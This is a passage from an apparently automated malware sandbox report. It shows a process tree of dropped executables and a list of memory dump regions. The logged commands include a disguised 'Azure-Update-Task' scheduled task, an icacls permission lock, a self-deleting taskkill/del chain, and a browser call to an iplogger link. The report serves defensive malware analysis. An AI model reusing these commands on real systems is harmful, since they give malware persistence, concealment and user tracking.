                                                                        • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2656
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Thu1170fdf4c09b1.exe
                                                                    4⤵
                                                                    • Loads dropped DLL
                                                                    PID:1752
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1170fdf4c09b1.exe
                                                                      Thu1170fdf4c09b1.exe
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:1684
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1170fdf4c09b1.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1170fdf4c09b1.exe
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:2376
                                                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                                                          "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1BQfx7
                                                                          7⤵
                                                                          • Modifies Internet Explorer settings
                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:3916
                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:275457 /prefetch:2
                                                                            8⤵
                                                                            • Modifies Internet Explorer settings
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:2648
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Thu1171b1ca5023f5d2.exe
                                                                    4⤵
                                                                    • Loads dropped DLL
                                                                    PID:1552
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1171b1ca5023f5d2.exe
                                                                      Thu1171b1ca5023f5d2.exe
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:916
                                                                      • C:\Windows\system32\WerFault.exe
                                                                        C:\Windows\system32\WerFault.exe -u -p 916 -s 800
                                                                        6⤵
                                                                        • Program crash
                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                        PID:3708
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Thu11f1187a97f50d9c.exe
                                                                    4⤵
                                                                    • Loads dropped DLL
                                                                    PID:1136
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu11f1187a97f50d9c.exe
                                                                      Thu11f1187a97f50d9c.exe
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Checks computer location settings
                                                                      • Loads dropped DLL
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:1680
                                                                      • C:\Users\Admin\Documents\mrZcYGtsjX9vOMhNiai00wUQ.exe
                                                                        "C:\Users\Admin\Documents\mrZcYGtsjX9vOMhNiai00wUQ.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:2268
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Thu118c8b4c3885d897d.exe
                                                                    4⤵
                                                                    • Loads dropped DLL
                                                                    PID:1756
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu118c8b4c3885d897d.exe
                                                                      Thu118c8b4c3885d897d.exe
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:1652
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu118c8b4c3885d897d.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu118c8b4c3885d897d.exe
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:2368
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Thu1189012621353ba47.exe
                                                                    4⤵
                                                                    • Loads dropped DLL
                                                                    PID:1380
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS864EC813\Thu1189012621353ba47.exe
                                                                      Thu1189012621353ba47.exe
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:688
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 948
                                                                        6⤵
                                                                        • Program crash
                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2924
                                                            • C:\Windows\system32\conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe "-19392130-1637321304189820756619819120961734476501267570914-229532620677669624"
                                                              1⤵
                                                              • Loads dropped DLL
                                                              PID:988
                                                            • C:\Windows\system32\rundll32.exe
                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              PID:3492
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                2⤵
                                                                  PID:3500
                                                              • C:\Users\Admin\AppData\Local\Temp\CFDC.exe
                                                                C:\Users\Admin\AppData\Local\Temp\CFDC.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:2748
                                                              • C:\Users\Admin\AppData\Local\Temp\13DE.exe
                                                                C:\Users\Admin\AppData\Local\Temp\13DE.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                PID:3260
                                                                • C:\Users\Admin\AppData\Local\Temp\13DE.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\13DE.exe
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Adds Run key to start application
                                                                  PID:2072
                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                    icacls "C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                    3⤵
                                                                    • Modifies file permissions
                                                                    PID:2716
                                                                  • C:\Users\Admin\AppData\Local\Temp\13DE.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\13DE.exe" --Admin IsNotAutoStart IsNotTask
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:1996
                                                                    • C:\Users\Admin\AppData\Local\Temp\13DE.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\13DE.exe" --Admin IsNotAutoStart IsNotTask
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Modifies extensions of user files
                                                                      PID:3816
                                                                      • C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe
                                                                        "C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe"
                                                                        5⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:1872
                                                                        • C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe
                                                                          "C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe"
                                                                          6⤵
                                                                          • Checks processor information in registry
                                                                          PID:3660
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                            7⤵
                                                                              PID:2680
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /im build2.exe /f
                                                                                8⤵
                                                                                • Kills process with taskkill
                                                                                PID:3380
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout /t 6
                                                                                8⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:3976
                                                                        • C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build3.exe
                                                                          "C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build3.exe"
                                                                          5⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:2208
                                                                          • C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build3.exe
                                                                            "C:\Users\Admin\AppData\Local\ea494335-d205-4064-8eaa-c513a14c0ad3\build3.exe"
                                                                            6⤵
                                                                              PID:3836
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                7⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:3456
                                                                  • C:\Windows\system32\taskeng.exe
                                                                    taskeng.exe {1906D76F-1CFA-4475-B549-E3C1C3886F4B} S-1-5-21-2375386074-2889020035-839874990-1000:AFOWCZMM\Admin:Interactive:[1]
                                                                    1⤵
                                                                      PID:3572
                                                                      • C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:3560
                                                                        • C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
                                                                          3⤵
                                                                            PID:2220
                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          2⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:2764
                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            3⤵
                                                                              PID:2756
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                4⤵
                                                                                • Creates scheduled task(s)
                                                                                PID:3844
                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            2⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:2100
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              3⤵
                                                                                PID:1588
                                                                            • C:\Users\Admin\AppData\Roaming\atetbaa
                                                                              C:\Users\Admin\AppData\Roaming\atetbaa
                                                                              2⤵
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:4036
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              2⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:3492
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                3⤵
                                                                                  PID:1664
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                2⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:588
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  3⤵
                                                                                    PID:1236
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  2⤵
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:1652
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    3⤵
                                                                                      PID:3328
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    2⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4088
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      3⤵
                                                                                        PID:2492
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      2⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:3980
                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        3⤵
                                                                                          PID:3272
                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        2⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:3676
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          3⤵
                                                                                            PID:3644
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          2⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:1096
                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            3⤵
                                                                                              PID:2668
                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            2⤵
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:3112
                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              3⤵
                                                                                                PID:3408
                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              2⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:2412
                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                3⤵
                                                                                                  PID:1744
                                                                                              • C:\Users\Admin\AppData\Roaming\atetbaa
                                                                                                C:\Users\Admin\AppData\Roaming\atetbaa
                                                                                                2⤵
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:2804
                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                2⤵
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:2424
                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                  3⤵
                                                                                                    PID:3412
                                                                                                • C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe
                                                                                                  C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task
                                                                                                  2⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:3052
                                                                                                  • C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe
                                                                                                    C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task
                                                                                                    3⤵
                                                                                                      PID:2284
                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                    2⤵
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:1448
                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                      3⤵
                                                                                                        PID:1684
                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                      2⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:1940
                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        3⤵
                                                                                                          PID:2712
                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        2⤵
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:3872
                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                          3⤵
                                                                                                            PID:2208
                                                                                                        • C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe
                                                                                                          C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task
                                                                                                          2⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:704
                                                                                                          • C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe
                                                                                                            C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task
                                                                                                            3⤵
                                                                                                              PID:1856
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 692
                                                                                                                4⤵
                                                                                                                • Program crash
                                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                PID:3672
                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                            2⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:2752
                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              3⤵
                                                                                                                PID:2656
                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              2⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:3036
                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                3⤵
                                                                                                                  PID:1136
                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                2⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:2232
                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  3⤵
                                                                                                                    PID:2832
                                                                                                                • C:\Users\Admin\AppData\Roaming\atetbaa
                                                                                                                  C:\Users\Admin\AppData\Roaming\atetbaa
                                                                                                                  2⤵
                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:1244
                                                                                                                • C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe
                                                                                                                  C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task
                                                                                                                  2⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:2568
                                                                                                                  • C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe
                                                                                                                    C:\Users\Admin\AppData\Local\48e5a06f-a99e-4ee6-aa69-519deab487be\13DE.exe --Task
                                                                                                                    3⤵
                                                                                                                      PID:3444
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 688
                                                                                                                        4⤵
                                                                                                                        • Program crash
                                                                                                                        PID:1448
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\43D5.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\43D5.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  PID:1560
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  PID:636
                                                                                                                • C:\Windows\system32\makecab.exe
                                                                                                                  "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20210916204031.log C:\Windows\Logs\CBS\CbsPersist_20210916204031.cab
                                                                                                                  1⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  PID:1096
                                                                                                                • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
                                                                                                                  "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
                                                                                                                  1⤵
                                                                                                                    PID:2880
                                                                                                                  • C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
                                                                                                                    "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
                                                                                                                    1⤵
                                                                                                                      PID:3144

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • memory/296-206-0x0000000000150000-0x0000000000151000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/296-236-0x000000001B0D0000-0x000000001B0D2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/576-186-0x0000000000250000-0x0000000000298000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      288KB

                                                                                                                    • memory/576-197-0x0000000000400000-0x0000000002B6B000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      39.4MB

                                                                                                                    • memory/636-308-0x0000000002BE0000-0x0000000002BE1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/688-223-0x0000000000400000-0x00000000004D7000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      860KB

                                                                                                                    • memory/688-219-0x0000000001E70000-0x0000000001F44000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      848KB

                                                                                                                    • memory/748-184-0x0000000140000000-0x0000000140650000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.3MB

                                                                                                                    • memory/760-203-0x0000000003930000-0x0000000003931000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/760-210-0x0000000003AC0000-0x0000000003AC1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/760-196-0x0000000002240000-0x0000000002241000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/760-200-0x0000000002250000-0x0000000002251000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/760-195-0x0000000000C00000-0x0000000000C01000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/760-194-0x0000000000BF0000-0x0000000000BF1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/760-193-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/760-192-0x0000000072F61000-0x0000000072F63000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/760-204-0x0000000003A50000-0x0000000003A51000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/760-191-0x0000000000260000-0x0000000000261000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/760-205-0x0000000003A60000-0x0000000003A61000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/760-190-0x0000000002200000-0x000000000223C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      240KB

                                                                                                                    • memory/760-207-0x0000000003A70000-0x0000000003A71000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/760-211-0x0000000003AD0000-0x0000000003AD1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/760-213-0x0000000003AE0000-0x0000000003AE1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/760-215-0x0000000003B30000-0x0000000003B87000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      348KB

                                                                                                                    • memory/760-216-0x0000000003B30000-0x0000000003B87000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      348KB

                                                                                                                    • memory/916-208-0x0000000000D90000-0x0000000000D91000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/916-239-0x00000000003C0000-0x00000000003CB000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      44KB

                                                                                                                    • memory/916-224-0x000000001B1D0000-0x000000001B1D2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/948-366-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/964-322-0x0000000000260000-0x0000000000261000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/992-321-0x0000000000400000-0x0000000002B5D000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      39.4MB

                                                                                                                    • memory/992-316-0x0000000000240000-0x000000000026F000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      188KB

                                                                                                                    • memory/1112-311-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      80KB

                                                                                                                    • memory/1112-53-0x0000000075951000-0x0000000075953000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/1212-344-0x0000000004DA0000-0x0000000004DA1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/1228-227-0x00000000022C0000-0x00000000022D5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      84KB

                                                                                                                    • memory/1308-362-0x0000000000A50000-0x0000000000A51000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/1560-303-0x0000000005280000-0x0000000005281000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/1652-199-0x0000000000270000-0x0000000000271000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/1652-221-0x0000000004840000-0x0000000004841000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/1680-229-0x0000000003C90000-0x0000000003DD0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      1.2MB

                                                                                                                    • memory/1684-198-0x0000000000F00000-0x0000000000F01000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/1684-222-0x0000000004BC0000-0x0000000004BC1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/1696-357-0x0000000004470000-0x0000000004471000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/1736-220-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      328KB

